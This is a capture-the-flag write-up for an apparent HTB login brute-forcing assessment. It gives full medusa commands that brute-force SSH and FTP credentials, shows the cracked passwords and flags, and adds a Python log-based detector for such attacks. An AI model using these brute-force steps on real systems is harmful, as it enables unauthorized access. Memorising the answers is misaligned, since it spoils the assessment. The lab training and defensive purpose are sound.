Skills Assessment Part 2 - Login Brute Forcing

Description:
This is the second part of the skills assessment. YOU NEED TO COMPLETE THE FIRST PART BEFORE STARTING THIS. Use the username you were given when you completed part 1 of the skills assessment to brute force the login on the target instance.

TARGET: 154.57.164.65:31810


Challenge 1

What is the username of the ftp user you find via brute-forcing?

Discovery

Since we are told that an FTP server is involved and that we are looking for the username used to access it, we first need to get onto the target machine. To do that, I will use the username obtained in Skills Assessment Part 1 - Login Brute Forcing to brute-force an SSH password, so that we can then establish an SSH session and connect directly to the FTP server.

I will brute force the ssh password using the following medusa command and the already known username:

┌──(macc㉿kaliLab)-[~/htb/login_brute_forcing]
└─$ medusa -h 154.57.164.65 -n 31810 -u satwossh -P 2023-200_most_used_passwords.txt -M ssh -t 3

Output:

...
2026-04-02 13:27:03 ACCOUNT FOUND: [ssh] Host: 154.57.164.65 User: satwossh Password: password1 [SUCCESS]
...

Now we know the SSH password for the satwossh user, so we can start an SSH session, which is the first step toward reaching the FTP server we are targeting:

┌──(macc㉿kaliLab)-[~/htb/login_brute_forcing]
└─$ ssh satwossh@154.57.164.65 -p 31810

After entering the SSH password for user satwossh, we are logged into the target machine:

The authenticity of host '[154.57.164.65]:31810 ([154.57.164.65]:31810)' can't be established.
ED25519 key fingerprint is: SHA256:0ldLAJLTwIrE2wupFhvN1WiHuimct7AF+pBddY5xIi8
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[154.57.164.65]:31810' (ED25519) to the list of known hosts.
satwossh@154.57.164.65's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.18.9-talos x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$

Once we are inside the system, knowing that we are looking for an FTP user, the next step is to identify any activity related to FTP connections. The challenge makes this easier by placing useful files in the directory we logged into:

satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ ls
IncidentReport.txt  passwords.txt  username-anarchy

Reading IncidentReport.txt:

satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ cat IncidentReport.txt
System Logs - Security Report

Date: 2024-09-06

Upon reviewing recent FTP activity, we have identified suspicious behavior linked to a specific user. The user **Thomas Smith** has been regularly uploading files to the server during unusual hours and has bypassed multiple security protocols. This activity requires immediate investigation.

All logs point towards Thomas Smith being the FTP user responsible for recent questionable transfers. We advise closely monitoring this user’s actions and reviewing any files uploaded to the FTP server.

Note that we are also given the username-anarchy directory containing the username-anarchy executable, which we will use to generate possible usernames for a user named "Thomas Smith". To do this, I changed into the username-anarchy directory and ran the following command:

satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~/username-anarchy$ ./username-anarchy Thomas Smith > ../thomas_smith_usernames.txt

Look at the usernames that username-anarchy generated for us:

satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ cat thomas_smith_usernames.txt
thomas
thomassmith
thomas.smith
thomassm
thomsmit
thomass
t.smith
tsmith
sthomas
s.thomas
smitht
smith
smith.t
smith.thomas
ts

Now we are ready to brute-force the ftp username with an appropriate medusa command:

satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ medusa -h 127.0.0.1 -U thomas_smith_usernames.txt -P passwords.txt -M ftp -t 5

Output:

...
ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: thomas Password: chocolate! [SUCCESS]
...

flag: thomas
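
From the defender's side, a run like the one above shows up in the FTP server's log as a burst of failed logins across several variants of one person's name from a single client, followed by a success. The Python below is an added example, not part of the original write-up: the log lines are constructed, the thresholds are arbitrary, and it assumes vsftpd is writing its native log format (`FAIL LOGIN` / `OK LOGIN` lines).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in vsftpd's native log format (not from the target).
SAMPLE_LOG = """\
Fri Sep  6 02:14:01 2024 [pid 811] [thomassmith] FAIL LOGIN: Client "127.0.0.1"
Fri Sep  6 02:14:02 2024 [pid 812] [thomas.smith] FAIL LOGIN: Client "127.0.0.1"
Fri Sep  6 02:14:03 2024 [pid 813] [tsmith] FAIL LOGIN: Client "127.0.0.1"
Fri Sep  6 02:14:04 2024 [pid 814] [smitht] FAIL LOGIN: Client "127.0.0.1"
Fri Sep  6 02:14:05 2024 [pid 815] [thomas] FAIL LOGIN: Client "127.0.0.1"
Fri Sep  6 02:14:06 2024 [pid 816] [thomas] OK LOGIN: Client "127.0.0.1"
Fri Sep  6 09:30:00 2024 [pid 900] [backup] FAIL LOGIN: Client "10.0.0.7"
Fri Sep  6 09:30:20 2024 [pid 901] [backup] OK LOGIN: Client "10.0.0.7"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"')

def parse(log_text):
    """Yield (timestamp, client, user, succeeded) for each login line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            yield ts, m["client"], m["user"], m["result"] == "OK"

def detect(log_text, min_failures=5, min_users=3, window=timedelta(minutes=10)):
    """Flag a successful login that follows a burst of failures from one client."""
    failures = defaultdict(list)          # client -> [(timestamp, username), ...]
    alerts = []
    for ts, client, user, ok in parse(log_text):
        if not ok:
            failures[client].append((ts, user))
            continue
        recent = [(t, u) for t, u in failures[client] if ts - t <= window]
        users = {u for _, u in recent}    # distinct usernames tried before the success
        if len(recent) >= min_failures and len(users) >= min_users:
            alerts.append({"client": client, "account": user,
                           "failures": len(recent), "usernames_tried": len(users)})
        failures[client].clear()          # a success resets that client's history
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Because the attempts in this walkthrough were launched from an SSH session on the same host, the FTP client address is 127.0.0.1, so an alert like this has to be correlated with the preceding SSH login rather than handled by banning a source IP.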

Challenge 2

What is the flag contained within flag.txt?

Having already brute-forced the username and password used for the ftp server, we are ready to start an ftp session and retrieve the flag!

satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ ftp ftp://thomas:chocolate\!@localhost

Output (using ls and get):

Trying [::1]:21 ...
Connected to localhost.
220 (vsFTPd 3.0.5)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||22069|)
150 Here comes the directory listing.
-rw-------    1 1001     1001           28 Sep 10  2024 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||10846|)
150 Opening BINARY mode data connection for flag.txt (28 bytes).
100% |************************************************************|    28      463.45 KiB/s    00:00 ETA
226 Transfer complete.
28 bytes received in 00:00 (98.00 KiB/s)
ftp> exit 
221 Goodbye.

Then read the file to get the flag:

satwossh@ng-130206-loginbfsatwo-hf6dn-84d5c94d98-tjlt6:~$ cat flag.txt
HTB{brut3f0rc1ng_succ3ssful}

flag: HTB